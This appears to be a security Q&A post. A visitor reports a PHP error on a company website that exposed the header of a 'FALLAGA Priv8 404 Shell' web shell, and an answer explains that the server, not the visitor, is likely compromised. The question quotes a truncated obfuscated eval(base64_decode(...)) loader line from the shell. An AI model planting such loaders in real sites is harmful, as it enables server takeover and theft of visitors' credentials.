# Odd PHP error referring to Fallaga Priv8 404 Shell when visiting a web site

Tags: malware, web-browser

I visited a website (belonging to a large company in northern Europe) yesterday. One of their pages in the "about us" section gave me a long error with a message that started with

```
<?PhP
/* FALLAGA Priv8 404 Shell V 1.11 */
/* Made y Black cat */
EVaL(BAsE64_DEcODe(’Ci8qICAgICAgCuKUj+KUgeKUk+KUj+KUgeKUk+KVi+KVi+KVi+KVi+KUj+KUk+KUj+KUk+KVi+KUj+KUk+KVi+KVi+KVi+KVi+KVi+KUj+KUkwrilIPilIPilJfilJvilIPilIPilYvilYvilYvilYvilIPilIPilIPilIPilYvilIPilIPilYvilYvilYvilYvilYvilIPilIMK4pSD4pSP4pST4pSP4pST4pSj4pSB4pSB4pSz4pSB4pSb4pSD4pSD4pSX4pSB4pSb4pSj4pSB4pSB4pSz4pSB4pSB4pSr4pSD4pSP4pSB4pSB4pSz4pSB4pSTCuKUg+KUg+KUg+KUg+KUg+KUg+KUj+KUk+KUg+KUj+KUk+KUg+KUg+KUj+KUgeKUk+KUg+KUj+KUk+KUg+KUj+KUgeKUq+KUg+KUg+KUg+KUgeKUq+KUj
```

The total length of the gibberish-looking part was like about 126kb (or that is anyway the size of the ASCII file where I saved it).

I reported this to the company and they told me that they will take a look at it.

From client perspective though this sort of thing looks to me like an embedded reverse shell malware that somehow failed to execute properly.

The question I wanted to ask is about whether I should be concerned that my own system is hacked.

**Question:**

Does this sort of message something that happened purely on the server, or could it indicate that my web browser or OS is compromised?

Screen shot of the error is below. I highlighted the part copied above.

[image]

Comment: sorry @Mirsad, I did not want to risk mucking with the company's efforts of fixing that issue by giving out the URL. I thought that their server had probably been somehow compromised (i.e. may have a vulnerability) and giving out the URL would allow some other actors to attempt adding their own code to it.

Answer (score 6, accepted):

This is indeed the code for a reverse shell. The server is most likely compromised.

Web shells are not intended to harm visitors, so neither your browser nor your OS were hacked. Moreover, it seems that it didn't even load correctly.

If you have an account on the site, then do not login until the company tells you they fixed it, since the attacker could grab your credentials.

If you used the same password elsewhere, you should change it on the other sites right now.